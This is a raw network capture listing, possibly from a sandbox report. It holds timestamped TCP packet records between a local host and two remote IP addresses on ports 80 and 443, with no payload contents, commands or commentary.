Dec 19, 2024 10:10:38.471934080 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.471983910 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.472057104 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.472101927 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.472997904 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.473046064 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.473325014 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.473428011 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.474431992 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.474478006 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.474555969 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.474713087 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.475625992 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.475687027 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.475727081 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.475783110 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.476533890 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.476651907 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.476706982 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.477596998 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.477663994 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.477704048 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.477704048 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.478574991 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.478626013 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.478661060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.478704929 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.479419947 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.479468107 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.479500055 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.479547977 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.480247021 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.480312109 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.480360031 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.480487108 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.481353998 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.481400967 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.481453896 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.481494904 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.482462883 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.482554913 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.482637882 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.482693911 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.483529091 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.483578920 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.483614922 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.483658075 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.484621048 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.484674931 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.601300001 CET	49946	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:38.601344109 CET	443	49946	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:38.601541042 CET	49946	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:38.602855921 CET	49946	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:38.602880955 CET	443	49946	172.67.179.109	192.168.2.6
Dec 19, 2024 10:10:38.608760118 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.608851910 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.608982086 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.609291077 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.609359026 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.609369993 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.610169888 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.610426903 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.610549927 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.610553980 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.610975981 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.611561060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.611610889 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.611620903 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.611658096 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.612560034 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.612705946 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.612763882 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.613646984 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.613761902 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.613821030 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.614763021 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.614852905 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.614882946 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.614955902 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.627254009 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.627305031 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.627305984 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.627877951 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.627933025 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.627944946 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.628751993 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.628804922 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.628990889 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.629061937 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.630083084 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.630218983 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.630250931 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.630285025 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.631453991 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.631515026 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.631550074 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.631603956 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.632443905 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.632539034 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.632611036 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.633363962 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.633436918 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.633467913 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.633543968 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.634192944 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.634244919 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.634340048 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.634387970 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.635173082 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.635196924 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.635237932 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.635238886 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.636063099 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.636120081 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.636140108 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.636441946 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.637156963 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.637217999 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.637226105 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.637315035 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.638144016 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.638205051 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.638305902 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.638365984 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.639265060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.639353991 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.639385939 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.639607906 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.640443087 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.640522957 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.640562057 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.640626907 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.641669035 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.641735077 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.641747952 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.641834974 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.642635107 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.642689943 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.642700911 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.643027067 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.643604994 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.643656015 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.643702984 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.643758059 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.644922018 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.644985914 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.645034075 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.645122051 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.645936966 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.645988941 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.646059036 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.646135092 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.647089958 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.647150040 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.647181034 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.647241116 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.648152113 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.648216963 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.648262024 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.648356915 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.649194002 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.649265051 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.649282932 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.649315119 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.650290966 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.650332928 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.650362015 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.650393963 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.651293993 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.651371956 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.651519060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.651573896 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.652393103 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.652478933 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.652539968 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.653492928 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.653568983 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.653579950 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.653687000 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.654768944 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.654829979 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.654874086 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.654942989 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.655863047 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.655951977 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.655999899 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.656058073 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.657068014 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.657155991 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.657274961 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.657330990 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.658782005 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.658860922 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.658909082 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.659184933 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.659722090 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.659840107 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.659899950 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.660552025 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.660629988 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.660636902 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.660753012 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.661449909 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.661513090 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.661530018 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.661582947 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.662240028 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.662295103 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.662385941 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.662435055 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.663332939 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.663381100 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.663490057 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.664344072 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.664612055 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.664665937 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.664741993 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.664798975 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.665524960 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.665591955 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.665632963 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.665693045 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.666651011 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.666713953 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.666762114 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.666814089 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.667701960 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.667762041 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.667812109 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.667862892 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.668879986 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.668956041 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.668963909 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.669054031 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.669980049 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.670070887 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.670079947 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.670128107 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.671009064 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.671073914 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.671135902 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.672158003 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.672216892 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.672235012 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.672444105 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.673187017 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.673271894 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.673286915 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.673366070 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.674283981 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.674346924 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.674395084 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.674598932 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.675396919 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.675463915 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.675544024 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.675606966 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.676454067 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.676523924 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.800951958 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.801007032 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.801024914 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.801076889 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.801414013 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.801503897 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.801529884 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.801563025 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.802283049 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.802381039 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.802412033 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.802459002 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.803349972 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.803405046 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.803489923 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.803550005 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.804491043 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.804553986 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.804560900 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.805536985 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.805636883 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.805721998 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.805772066 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.806817055 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.806878090 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.806955099 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.807120085 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.819271088 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.819367886 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.819401979 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.819417953 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.819768906 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.819787979 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.819823980 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.819838047 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.820756912 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.820864916 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.820902109 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.820950031 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.821878910 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.821927071 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.821963072 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.822005987 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.822859049 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.822909117 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.822952032 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.823101997 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.823990107 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.824038029 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.824110031 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.824152946 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.825371981 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.825434923 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.825459957 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.825510025 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.826354980 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.826433897 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.826443911 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.826478958 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.827260017 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.827317953 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.827336073 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.828239918 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.828284979 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.828325033 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.828391075 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.828435898 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.829483032 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.829534054 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.829596043 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.829642057 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.830456018 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.830506086 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.830547094 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.830593109 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.831629038 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.831729889 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.831773996 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.831857920 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:38.832664013 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:38.832794905 CET	80	49928	185.215.113.16	192.168.2.6
